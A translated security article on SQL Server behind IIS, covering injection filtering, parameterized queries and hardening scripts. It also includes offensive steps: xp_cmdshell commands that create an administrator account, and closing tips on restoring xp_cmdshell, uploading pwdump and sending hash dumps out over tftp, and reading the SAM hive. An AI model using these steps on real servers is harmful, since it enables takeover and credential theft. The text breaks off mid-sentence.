Learn about IIS to SQL Server database security

Source: Internet
Author: User

From Code Red to Nimda, worms have turned vulnerabilities that once had to be exploited by hand into ones that programs exploit automatically. Is there still any point in working these IIS vulnerabilities manually? Let's shift our attention to the databases commonly found on the server.

Most websites are built on a database, especially dynamic sites written in ASP, PHP, or JSP. Many sites pay close attention to operating system vulnerabilities but neglect the security of the database and of the scripts that talk to it.

Start with the most common scripting issues; these are old topics. You can refer to the example of a simple database intrusion and vandalism written by Hectic, which explains the SQL script issue in detail. You can also filter script input as a security measure; for more information, see what I wrote earlier. For ASP, you can use the following filter function:


Function Filter_SQL(strData)
    Dim strFilter
    Dim blnFlag
    Dim I
    Dim arrayFilter

    ' Blacklisted substrings, comma separated: quote, semicolon, comment
    ' markers, @, _, and the keywords exec and declare
    strFilter = "',;,//,--,@,_,exec,declare"
    blnFlag = False

    arrayFilter = Split(strFilter, ",")
    For I = 0 To UBound(arrayFilter)
        ' Case-insensitive search so that EXEC is caught as well as exec
        If InStr(1, strData, arrayFilter(I), vbTextCompare) > 0 Then
            blnFlag = True
            Exit For
        End If
    Next

    If blnFlag Then
        Response.Redirect "wrong.asp"
    Else
        Filter_SQL = strData
    End If
End Function
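A blacklist such as the one above rejects characters instead of separating code from data, so it blocks legitimate values (names with an apostrophe, identifiers with an underscore) while still depending on the list being complete. The reliable alternative on SQL Server is to pass the user's value as a parameter. The T-SQL below is an added example, not code from the article: it assumes SQL Server 2005 or later, and the Customers table, its rows and the FindCustomer_* procedure names are constructed for the demonstration. An ASP page gets the same effect by calling the safe procedure through an ADODB.Command with a parameter instead of building the SQL string itself.

```sql
USE tempdb;
GO

-- Constructed sample table and rows for this example
IF OBJECT_ID('dbo.Customers', 'U') IS NOT NULL DROP TABLE dbo.Customers;
CREATE TABLE dbo.Customers (id INT IDENTITY(1,1) PRIMARY KEY, name NVARCHAR(50) NOT NULL);
INSERT INTO dbo.Customers (name) VALUES (N'Alice');
INSERT INTO dbo.Customers (name) VALUES (N'O''Brien');   -- a legitimate name containing a quote
GO

-- Unsafe pattern: the caller's value is spliced into the statement text, so any
-- quote inside the value changes the SQL itself. A blacklist in the ASP page
-- only papers over this.
IF OBJECT_ID('dbo.FindCustomer_Unsafe', 'P') IS NOT NULL DROP PROCEDURE dbo.FindCustomer_Unsafe;
GO
CREATE PROCEDURE dbo.FindCustomer_Unsafe @name NVARCHAR(50)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX);
    SET @sql = N'SELECT id, name FROM dbo.Customers WHERE name = ''' + @name + N'''';
    EXEC (@sql);
END;
GO

-- Safe pattern: the statement text is constant and the value is bound as a
-- parameter with sp_executesql, so it is only ever treated as data and no
-- character blacklist is needed.
IF OBJECT_ID('dbo.FindCustomer_Safe', 'P') IS NOT NULL DROP PROCEDURE dbo.FindCustomer_Safe;
GO
CREATE PROCEDURE dbo.FindCustomer_Safe @name NVARCHAR(50)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX);
    SET @sql = N'SELECT id, name FROM dbo.Customers WHERE name = @n';
    EXEC sp_executesql @sql, N'@n NVARCHAR(50)', @n = @name;
END;
GO

-- Same legitimate input for both: the safe procedure returns the O'Brien row,
-- the unsafe one fails to parse the statement it built (unclosed quotation mark).
EXEC dbo.FindCustomer_Safe @name = N'O''Brien';
EXEC dbo.FindCustomer_Unsafe @name = N'O''Brien';
GO
```

When the statement does not need to be built dynamically at all, a plain `SELECT ... WHERE name = @name` inside the procedure is simpler still; sp_executesql is shown because it covers the dynamic case where developers are most tempted to concatenate.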

For Microsoft SQL Server, the security issues are not limited to scripts. Microsoft's products are tightly integrated: the whole Windows-based application stack is closely coupled, and for SQL Server, database administration and system administration are essentially equivalent. SQL Server's default administrator account "sa" has an empty password by default, which leaves a hole on most NT servers. Xiao Rong's "SQLRCMD" can use an obtained database administrator account to execute system commands.

SQL Server ships with many system stored procedures; some are used internally by the database engine and others are invoked by calling the stored procedure directly.

System stored procedure: xp_cmdshell

It executes the given command string through the operating system's command-line interpreter. The syntax is: xp_cmdshell {'command_string'} [, no_output]

By default, only members of sysadmin can execute xp_cmdshell, but a sysadmin can grant the execute permission to other users. In earlier versions, users granted execute permission on xp_cmdshell ran commands under the SQL Server service account; SQL Server could be configured so that users without sa permissions ran xp_cmdshell under the SQLExecutiveCmdExec Windows NT account, called SQLAgentCmdExec in SQL Server 7.0. In SQL Server 2000, any account that can execute the stored procedure can run commands directly.

On NT and Windows 2000, when the caller is not a member of the sysadmin role, xp_cmdshell impersonates the SQL Server Agent proxy account specified with xp_sqlagent_proxy_account. If the proxy account cannot be used, xp_cmdshell fails. So even an account that is db_owner of the master database cannot execute the stored procedure without it.

If we have a database account that can execute xp_cmdshell, such as an sa account with a blank password, we can execute the following commands:

exec xp_cmdshell 'net user refdom 123456 /add'
exec xp_cmdshell 'net localgroup administrators refdom /add'


These two calls add a user named refdom to the local Administrators group.

Once the database's sa administrator account is obtained, the whole machine can be fully controlled. This shows how important database security is.

The following stored procedures can be executed by public:

xp_fileexist: determines whether a file exists.
xp_getfiledetails: obtains the details of a file.
xp_dirtree: expands any directory you want to know about and returns the depth of all its subdirectories.
xp_getnetname: obtains the server name.


There are also stored procedures that operate on the registry. Apart from xp_regread, these are not executable by public and must be run by the system administrator or by an account that has been granted the permission:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumvalues
xp_regread (executable by public)
xp_regremovemultistring
xp_regwrite


SQL Server Security Configuration

Besides applying all of Microsoft's patches, the database itself must be hardened.

First, strengthen the password of accounts such as sa, just as you would for system accounts. In general, do not use a highest-privilege account such as sa for application access to the database; use an ordinary account that has only the permissions you need.

Then remove the extended stored procedures. xp_cmdshell is the first to go, and all the procedures listed above can be dropped, since they are generally not needed.

Run:

use master
sp_dropextendedproc 'xp_cmdshell'


Remove the guest account to prevent unauthorized access.

Remove unnecessary network protocols.

Strengthen the logging of database logins; it is best to record all login events. You can use the following simple DOS command to search the logs:

findstr /C:"login" "d:\Microsoft SQL Server\MSSQL\LOG\*.*"

Use the administrator account to check all accounts regularly for blank or overly simple passwords, for example with the following statement:

use master
select name, password from syslogins where password is null


Use the following statement to list the stored procedures and extended stored procedures that public can execute, and guard against execute permissions spreading unnecessarily:

use master
select sysobjects.name from sysobjects, sysprotects
where sysprotects.uid = 0
  and xtype in ('X', 'P')
  and sysobjects.id = sysprotects.id
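The hardening and audit steps above (disable xp_cmdshell, revoke the public-executable extended procedures, record logins, look for blank passwords, list what public can execute) can be gathered into one script against the current system catalog views. This is an added example, not from the article: it assumes SQL Server 2005 or later run as sysadmin, that sp_dropextendedproc (the 7.0/2000 method shown above) is replaced by the xp_cmdshell configuration option, that the AuditLevel registry value is the one the "Login auditing" server option sets (an assumption; verify on your version), and that sp_readerrorlog, which is undocumented but long-standing, accepts the log number, log type and search string used here.

```sql
USE master;
GO

-- 1. Disable xp_cmdshell (SQL Server 2005 and later expose it as a server
--    configuration option; dropping it is the 7.0/2000 method).
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;  RECONFIGURE;
GO

-- 2. Take EXECUTE on the file/registry/network extended procedures listed in
--    the article away from public. Only procedures present on this version
--    are touched, since some were removed in later releases.
DECLARE @proc sysname, @sql NVARCHAR(200);
DECLARE c CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.all_objects
    WHERE type = 'X'
      AND name IN ('xp_fileexist', 'xp_getfiledetails', 'xp_dirtree',
                   'xp_getnetname', 'xp_regread');
OPEN c;
FETCH NEXT FROM c INTO @proc;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @sql = N'REVOKE EXECUTE ON ' + QUOTENAME(@proc) + N' FROM public;';
    EXEC sp_executesql @sql;
    FETCH NEXT FROM c INTO @proc;
END;
CLOSE c; DEALLOCATE c;
GO

-- 3. Log every login attempt, successful or failed (AuditLevel 3 = both;
--    assumed registry location, takes effect after the service restarts).
EXEC xp_instance_regwrite N'HKEY_LOCAL_MACHINE',
     N'Software\Microsoft\MSSQLServer\MSSQLServer', N'AuditLevel', REG_DWORD, 3;
GO

-- 4. Audit: SQL logins whose password is blank or equal to the login name.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE(N'', password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1;

-- 5. Audit: extended stored procedures that public may still execute
--    (the sys.* equivalent of the sysobjects/sysprotects query above;
--    principal id 0 is public, state G/W = granted / granted with grant option).
SELECT o.name
FROM sys.all_objects AS o
JOIN sys.database_permissions AS p
  ON p.class = 1 AND p.major_id = o.object_id
WHERE o.type = 'X'
  AND p.permission_name = 'EXECUTE'
  AND p.state IN ('G', 'W')
  AND p.grantee_principal_id = DATABASE_PRINCIPAL_ID('public')
ORDER BY o.name;

-- 6. Audit: failed logins recorded in the current error log
--    (log 0 = current, 1 = SQL Server log, then the search string).
EXEC sp_readerrorlog 0, 1, N'Login failed';
GO
```

Steps 4 to 6 are the ones to schedule: running them after each change shows whether a blank password or a public grant has crept back in, and the failed-login listing is what the findstr command above gives you from the file system.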

Strengthening database security is very important. Some database servers are isolated from the web server, and, as with a mail server, their logs may rarely be reviewed; this becomes a blind spot for the administrator. Like DNS and mail servers, database servers often become the springboard for intrusions.

The following are some questions and tips about databases:

1. What should I do if I cannot execute the xp_cmdshell stored procedure after obtaining sa permission?

A: xp_cmdshell and the other extended stored procedures have been deleted. You can restore xp_cmdshell with this stored procedure:

sp_addextendedproc 'xp_cmdshell', 'sqlsql70.dll'

2. Use pwdump to obtain the system administrator password.

Upload pwdump first:

tftp -i GET pwdump3.exe pwdump3.exe
tftp -i GET lsaext.dll lsaext.dll
tftp -i GET pwservice.exe
pwdump3 127.0.0.1 outfile.txt
tftp PUT outfile.txt


Then use the cracking tool l0pht to crack these passwords.

3. Read the system administrator password from the database.

The password hashes cannot be read under the NT "Administrator" account, but SQL Server running as "LocalSystem", which is more privileged than Administrator, can read them with the following stored procedure. What is read is still encrypted and has to be decrypted afterwards.

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

Of course, there are still many database security problems and defects, and more research is needed. I am still at the initial stage of learning about databases; I apologise for any mistakes, and please kindly point them out. If you have
